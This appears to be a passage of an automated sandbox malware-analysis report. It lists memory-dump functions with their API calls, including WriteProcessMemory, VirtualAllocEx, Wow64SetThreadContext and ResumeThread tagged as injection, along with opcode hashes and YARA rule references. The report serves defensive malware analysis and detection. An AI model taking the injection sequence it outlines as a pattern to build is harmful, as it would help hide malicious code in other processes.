Opcode ID: 615aef5cb2b293660689c9a4dd7f318a6ac1671e772e290adaef8a2e62df7e97
Instruction ID: fc892503b425218dcdec9777b09d4dbfb82072c06550758b8bc0e5a5ee77c645
Opcode Fuzzy Hash: 615aef5cb2b293660689c9a4dd7f318a6ac1671e772e290adaef8a2e62df7e97
Instruction Fuzzy Hash: 573189B1814648CFDB11CBA9C8987ADBFF1BF46308F944289C045AB2A5C775A90ACF11

Function 027058F3 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 027059A9

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3a1bee7f8ba38e59766a003b67a7755f94235cbab3a3fc06a9e491f918f9c1dd
Instruction ID: 691f6756bdde67bfd79be107226db40dce0b6928293eec6d5fedaa8c77ae9c28
Opcode Fuzzy Hash: 3a1bee7f8ba38e59766a003b67a7755f94235cbab3a3fc06a9e491f918f9c1dd
Instruction Fuzzy Hash: 9741CFB0D10719CBDB24DFAAC984A9DBBF6BF48304F20816AD408BB255DB756949CF50

Function 04766E8B Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04766F20

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e7feade6be0656ac1e06a4cdb5d9415d4206266e7d502bf0616b4eb6b5548d64
Instruction ID: 91f621183fc65413676a1999d40fc3d625e2ba5aeb2484c1e21c61311ca00e1d
Opcode Fuzzy Hash: e7feade6be0656ac1e06a4cdb5d9415d4206266e7d502bf0616b4eb6b5548d64
Instruction Fuzzy Hash: A22148759003099FDB10CFAAD881BDEBFF5FF48320F14842AE919A7241C7799944DBA1

Function 0476BA09 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b635343f6f52e0dc92474a01ef4582861afa1f6dbec67491408df6a16a727b57
Instruction ID: 82564845ab1a7bd1afea7eb255141bffdbfb19ddd6394c7c01326cc3eed53b1d
Opcode Fuzzy Hash: b635343f6f52e0dc92474a01ef4582861afa1f6dbec67491408df6a16a727b57
Instruction Fuzzy Hash: 9E21DE76E04228DBCB30DFA5C8047EEBBF6AB8A710F10805AD946B7241D735BD04DBA0

Function 04766E90 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04766F20

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e22cc20b89ffa6e00dcd2f57f3ee204b772fb4f4de848d24eba5ed1d376276cc
Instruction ID: 625d772572e512e5939fbf759af18abd37b248d03dae2123d478c7991f22e816
Opcode Fuzzy Hash: e22cc20b89ffa6e00dcd2f57f3ee204b772fb4f4de848d24eba5ed1d376276cc
Instruction Fuzzy Hash: 622127759003499FDB10CFAAC985BDEBBF5FF48320F50842AE919A7240C779A944DBA0

Function 04766F78 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04767000

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1498dd0216afceeebfc6b18b2ee75c05dbefdc1999aa0e83ea97a01f0550ea91
Instruction ID: 3e12c724a291eac5d821047ca42f7b1cf65b51bdd8f5e44bf5f040d62014604a
Opcode Fuzzy Hash: 1498dd0216afceeebfc6b18b2ee75c05dbefdc1999aa0e83ea97a01f0550ea91
Instruction Fuzzy Hash: BE214F75C003099FDB10CFAAD841AEEBBF5FF48320F50842AE519A3250D775A941DBA0

Function 04766CF3 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04766D76

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 629c49711d4f69170a7345e8a62219e9e7ebd6e5395c704f88a7fe7b23bc13cc
Instruction ID: d28e3bca2366674f88eaab5ff19448f237396e10e2a0465530f2ad720790a4ef
Opcode Fuzzy Hash: 629c49711d4f69170a7345e8a62219e9e7ebd6e5395c704f88a7fe7b23bc13cc
Instruction Fuzzy Hash: 7B213A71D002098FDB10DFAAC4857EEBFF5EF58320F54842AD419A7241DB78A944CFA1

Function 0270D1BC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0270D596,?,?,?,?,?), ref: 0270D657

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fa737fbdd40e6ad3a01e67754c06d6fd8cb551627438beb1de836792d0f3a466
Instruction ID: 9075b032b190a4d2d04fb0dcf3bf228f5346a606f4cca80d0d46f5ca2a8a3d78
Opcode Fuzzy Hash: fa737fbdd40e6ad3a01e67754c06d6fd8cb551627438beb1de836792d0f3a466
Instruction Fuzzy Hash: 2221E3B5900348DFDB10CF9AD984ADEBBF8EB48320F14801AE918B3350D375A944DFA4

Function 0270D5C9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0270D596,?,?,?,?,?), ref: 0270D657

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0a6da1dacc8f39a2b32eab2522cb8fc2b7e0d8b0343e9e793d1a911cf42d889e
Instruction ID: 09f3d499fa8c1f1227ba43ddd4aca518db3924e303ebbf4843d7d9f773ffdb8f
Opcode Fuzzy Hash: 0a6da1dacc8f39a2b32eab2522cb8fc2b7e0d8b0343e9e793d1a911cf42d889e
Instruction Fuzzy Hash: 6D21E4B5900209DFDB10CFAAD985ADEBFF5EB48320F14801AE918A3350D374A944CFA4

Function 04766CF8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04766D76

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 78428eeb676fdb4b5f30d4de7884fb8e22f76953bf27bf5ea5543681522e6f89
Instruction ID: 2ef4fc964b150a2eeb398041f9074af673362c2aa432110fbe11e3428379d737
Opcode Fuzzy Hash: 78428eeb676fdb4b5f30d4de7884fb8e22f76953bf27bf5ea5543681522e6f89
Instruction Fuzzy Hash: 96213871D002098FDB10DFAAC4857AEBBF5EF48320F54842AD819A7241DB78A944CFA1

Function 04766F80 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04767000

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a3edf69ba27aa27a0494265a089ec59d2004bffa7930bb5126e260d45c2818f5
Instruction ID: 34c391de6bb1aad83f154a8d484c137620eef0773fadbd96585dc9c8006c5137
Opcode Fuzzy Hash: a3edf69ba27aa27a0494265a089ec59d2004bffa7930bb5126e260d45c2818f5
Instruction Fuzzy Hash: F8213AB1C003499FDB10CFAAC881AEEFBF5FF48320F10842AE919A7250D7759940DBA0

Function 04766DC8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04766E3E

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 54203f4ce7d1db94568583a11ca7f6dfc06758841d964ec0774ddff735b25524
Instruction ID: fda23c72303f9ebf6716144e62683e1a13f0f15a6c393845b400ca9d39f75c01
Opcode Fuzzy Hash: 54203f4ce7d1db94568583a11ca7f6dfc06758841d964ec0774ddff735b25524
Instruction Fuzzy Hash: DF116A76900249DFDB20CFAAD844ADFBFF5EF58320F14841AE919A7250CB75A944CFA0

Function 0270A070 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0270AFB9,00000800,00000000,00000000), ref: 0270B1CA

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5a8284407b835e055589384a550743e393fd096eebf051dcdd9ed7d0d3b542f2
Instruction ID: 117dc52e1a09cc9be71b7291d7b17c4b910f5e48d650c3c150d1acaeeec9a3a0
Opcode Fuzzy Hash: 5a8284407b835e055589384a550743e393fd096eebf051dcdd9ed7d0d3b542f2
Instruction Fuzzy Hash: 721117B6900309DFDB10CF9AD984A9EFBF4EB48314F10842EE519B7250C375A944CFA4

Function 0270B15B Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0270AFB9,00000800,00000000,00000000), ref: 0270B1CA

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1afb53dc6251338e4dbbafb4d8369bcda904659e3ca6d694118ad9fde0ac2d08
Instruction ID: 9c8be376db0fb7ace9426c36d187e328b99b11322864bb68fcbb01e4c427a888
Opcode Fuzzy Hash: 1afb53dc6251338e4dbbafb4d8369bcda904659e3ca6d694118ad9fde0ac2d08
Instruction Fuzzy Hash: 5111F6B6D00209CFDB10CF9AD984ADEFBF4EB88314F14842ED519A7640C375AA45CFA5

Function 04766C43 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04766CAA

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d5572c01a9f3fb79ecee77944eb3b32fdc2af142d785cb89ba2ba33177986d68
Instruction ID: 84cf87ef81ad6abfb200164430eb985132c9dc490fda691af292b22463c65939
Opcode Fuzzy Hash: d5572c01a9f3fb79ecee77944eb3b32fdc2af142d785cb89ba2ba33177986d68
Instruction Fuzzy Hash: 71115B75D002088FDB20DFAAD8457DFFFF9EB98320F14841AD419A7340CA75A944CBA4

Function 04766DD0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04766E3E

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a464dbfa6b021848c08b9aa6bb5944c24c11c1c5235a1b878d1e2dd644c49e1a
Instruction ID: 7b9882f219c686f8e23175035355cd2b3a995d63dc27d32045f5d8da32f3b6a4
Opcode Fuzzy Hash: a464dbfa6b021848c08b9aa6bb5944c24c11c1c5235a1b878d1e2dd644c49e1a
Instruction Fuzzy Hash: 01113A759002499FDB10DFAAC844ADFBFF5EF58320F14841AE515A7250C775A944DFA0

Function 0270AED3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0270AF3E

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 052955830f3efd692f6f4bd6684a12fbadf17a49ab745f529aff5e83e5b921ab
Instruction ID: bc3228c8732facd8e4fec5ef3f2ed2ecab79e7732e73c28e20834a8239ed6c0f
Opcode Fuzzy Hash: 052955830f3efd692f6f4bd6684a12fbadf17a49ab745f529aff5e83e5b921ab
Instruction Fuzzy Hash: 611113B6C00349CFDB10CF9AD584ADEFBF4EB88324F10845AD519A7650C379A549CFA1

Function 04766C48 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04766CAA

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cf220e6c268cb0d850f77546e5787904aa7957de9e3837361da4f19a5b6d58e7
Instruction ID: 0f5bca41aac668a65281062eede65b1999ad58fa39adb0e8c421b81b70ec1bb5
Opcode Fuzzy Hash: cf220e6c268cb0d850f77546e5787904aa7957de9e3837361da4f19a5b6d58e7
Instruction Fuzzy Hash: F8113AB1D002498FDB20DFAAC94579EFBF9EF88320F14841AD519A7340CB75A944CFA4

Function 0270AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0270AF3E

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: dc1254496dc848b3d9e9fce4e61a51e9ff19ec35a4a9ecfa4305ca49549d7b9e
Instruction ID: ddb793075f671fd0a9ed7b03cc8caf3e6c6fe7be5d4d5ca160ab87d3e08af1cd
Opcode Fuzzy Hash: dc1254496dc848b3d9e9fce4e61a51e9ff19ec35a4a9ecfa4305ca49549d7b9e
Instruction Fuzzy Hash: 911113B6C00349CFDB10CF9AD544ADEFBF4EB88324F10845AD518A7250C379A549CFA1

Function 04768940 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0476B9D5

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f5db0c573e6a28403c8f2a49a81488eb366309a6dfcbb79243c887ad17ae7403
Instruction ID: a9ec74403a9800e9b0ee2c80a3d81bea809d0af57114b4156ea08f4c7f6799e2
Opcode Fuzzy Hash: f5db0c573e6a28403c8f2a49a81488eb366309a6dfcbb79243c887ad17ae7403
Instruction Fuzzy Hash: 3F1106B5800349DFDB10CF9AC985BDEBBF8EB58320F10841AE919A7301C375A944CFA1

Function 06AEDF90 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

(iq, xrefs: 06AEE09C

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: 48ff151528e0c61aefc6e5f6186f53d1aafc75f74e57ae7e854e8756c4f05d51
Instruction ID: 08125284c8f4a9cba3714a4e3e8129e2deab405e5cde1e39c199564a6b60c1e9
Opcode Fuzzy Hash: 48ff151528e0c61aefc6e5f6186f53d1aafc75f74e57ae7e854e8756c4f05d51
Instruction Fuzzy Hash: D4919D70B002158FDB55EF69D494AAEBBF6FF89300B1485ADD406AB3A5DB30EC45CB90

Function 07568C28 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

Hiq, xrefs: 07568D46

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: Hiq
API String ID: 0-3823623015
Opcode ID: 4bb5e0a1e2b4d06a1083f669b10008c531963ba6b300664c888797cbc972da5d
Instruction ID: 1d5b231b893d30dea91c406637a2c5efa9821c305dc14966273caf4c5a269e2a
Opcode Fuzzy Hash: 4bb5e0a1e2b4d06a1083f669b10008c531963ba6b300664c888797cbc972da5d
Instruction Fuzzy Hash: 0C916474A002199FCB05DFA4D4949EEB7F6FF89300B14806AE909EB361E735ED06CB51

Function 07560040 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

d8jq, xrefs: 07560440

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: d8jq
API String ID: 0-124307943
Opcode ID: 4e570cff0aa4e83ff86cf56926a4f663e23740f13786f83c768fd9cdaa5577d7
Instruction ID: 20d4c80d63708a9159a7e0b03347692fe312c5e2058d0fe70e942d31b43a57ba
Opcode Fuzzy Hash: 4e570cff0aa4e83ff86cf56926a4f663e23740f13786f83c768fd9cdaa5577d7
Instruction Fuzzy Hash: B6617CB4B101199FCB15DF68D958AEE7BB6FF89311F14846AE806A7390DB70DC41CBA0

Function 075660CC Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

Teeq, xrefs: 0756C251

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 44f505b2d2748dc516bede964b6b8fa0e2d9fc715cfd68f6ed8591915184978c
Instruction ID: 5e78073b0d575c286249c1e8f7eefc4d69377041113cd48d9053b3db3387af9c
Opcode Fuzzy Hash: 44f505b2d2748dc516bede964b6b8fa0e2d9fc715cfd68f6ed8591915184978c
Instruction Fuzzy Hash: 7651C3B5B002068FCB11EBB9D8484AEBBF6FFC4350724856AE459DB351DF309D068BA0

Function 06AEE9A0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06AEE9F9

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 7c3d59754b970a83273325bd24eaccedf0a4ba0655f34ab21fa1a8ec927d3919
Instruction ID: 509789e5c03d4c5e6b2b7cbd92601068849dd3c8bc6fe09c8544a3c020dbcaec
Opcode Fuzzy Hash: 7c3d59754b970a83273325bd24eaccedf0a4ba0655f34ab21fa1a8ec927d3919
Instruction Fuzzy Hash: 8811037491A3C4AFC703EB74EA2148DBFB1AF42200B1446DBE445DB2A3DB381A19CB52

Function 0756BC08 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Teeq, xrefs: 0756BC73

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 22755a9723693aa1af5d7113a01531723be001ff7497b3d7ab302046d8e610e0
Instruction ID: 456518252993bfa45d1ffa7dae29019f1d6f3ef54ee290181315b3e3fee6ac16
Opcode Fuzzy Hash: 22755a9723693aa1af5d7113a01531723be001ff7497b3d7ab302046d8e610e0
Instruction Fuzzy Hash: 30111CB1F0020B8BDB54EBB999155EFB6F6BF88210B60447AC504E7344EF359E05CBA1

Function 0756045A Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

d8jq, xrefs: 07560440

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: d8jq
API String ID: 0-124307943
Opcode ID: 41f4885868786e3e9e73b40916c230987c8b447af2b73e20744ef153a14cc25b
Instruction ID: 3875d7049c681e6897c292a57612cd43fd15b4cbf0e3e375c95d93c6c74e5987
Opcode Fuzzy Hash: 41f4885868786e3e9e73b40916c230987c8b447af2b73e20744ef153a14cc25b
Instruction Fuzzy Hash: EC0124F5B102064FCB222A69E91CDEB7F99BF8125AF048477E90DC71C6EA70C81583A1

Function 06AEE9C8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06AEE9F9

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 7b76d0e69c7a40aebe1365362c761544b77659708147cf52dfe4dabd9a411183
Instruction ID: 400eb1c6ae6d0f1341dd7cfba75790d05ec564ceb4e60fc86c0c36f52c6d02cf
Opcode Fuzzy Hash: 7b76d0e69c7a40aebe1365362c761544b77659708147cf52dfe4dabd9a411183
Instruction Fuzzy Hash: 2AF08C78A01209EFCB05FFB8E65545DBFB5FF84200B2085AAE80993260DF342E45CF45

Function 06AE38A0 Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4599e64246ab442aed5fa14c12acfcf3c7a415f4b2aa3c44dd92d3d7726ed7c7
Instruction ID: ec6859962189d8ec8e49ca7a1a16e896a3f6d1656876527cc6b0521297538430
Opcode Fuzzy Hash: 4599e64246ab442aed5fa14c12acfcf3c7a415f4b2aa3c44dd92d3d7726ed7c7
Instruction Fuzzy Hash: F66201B0D11F424BD7B0BF7895583DFBAE5EB89380F21491ED5EACE641DB3494828B41

Function 06AEA329 Relevance: .5, Instructions: 533COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca87cfd763c215746fbb990e2b8728c20a2e38db39ff1f6f89112a30f9a564c2
Instruction ID: 97758a1cada7c9a4343cd6bcf36b950eb61766ce63255dd0e3ad2c2e64f702b8
Opcode Fuzzy Hash: ca87cfd763c215746fbb990e2b8728c20a2e38db39ff1f6f89112a30f9a564c2
Instruction Fuzzy Hash: 1442E230D10619CFCF55EFA8C8486DCBBB1BF49300F5182A9D5497B265EB30AA99CF91

Function 06AE38E0 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44da43eae41d8bced2f74c98725890e631490aa03b66dbf2ab3a0ade7e39dff
Instruction ID: 1af79bc7e1567442a77bb3707526bb3ba8d9363defce57ee9e2cc47464859968
Opcode Fuzzy Hash: c44da43eae41d8bced2f74c98725890e631490aa03b66dbf2ab3a0ade7e39dff
Instruction Fuzzy Hash: 7E223BB4D05F834BD7B4AB6886842DFE6D4EB89390F30495BC4FACE256E73490878B45

Function 06AE8164 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0500ad170f0f5d26be574687ccf4dcabe26b9751ad9b6b280102941d4d984d2
Instruction ID: 1f23fc39ffdd661e12666b3134f619a69d44cea0cb27c9dde582eacf41d5a471
Opcode Fuzzy Hash: c0500ad170f0f5d26be574687ccf4dcabe26b9751ad9b6b280102941d4d984d2
Instruction Fuzzy Hash: CDB1BC70E01209CFDB61EFA5D9846AEFBF2FF89300F20456AC105AB285DB399951CF81

Function 06AEBCF0 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f4cf2c7036f3fea5fb7dbedd943f736ebfa488dcda1602cccba33b6eff1637
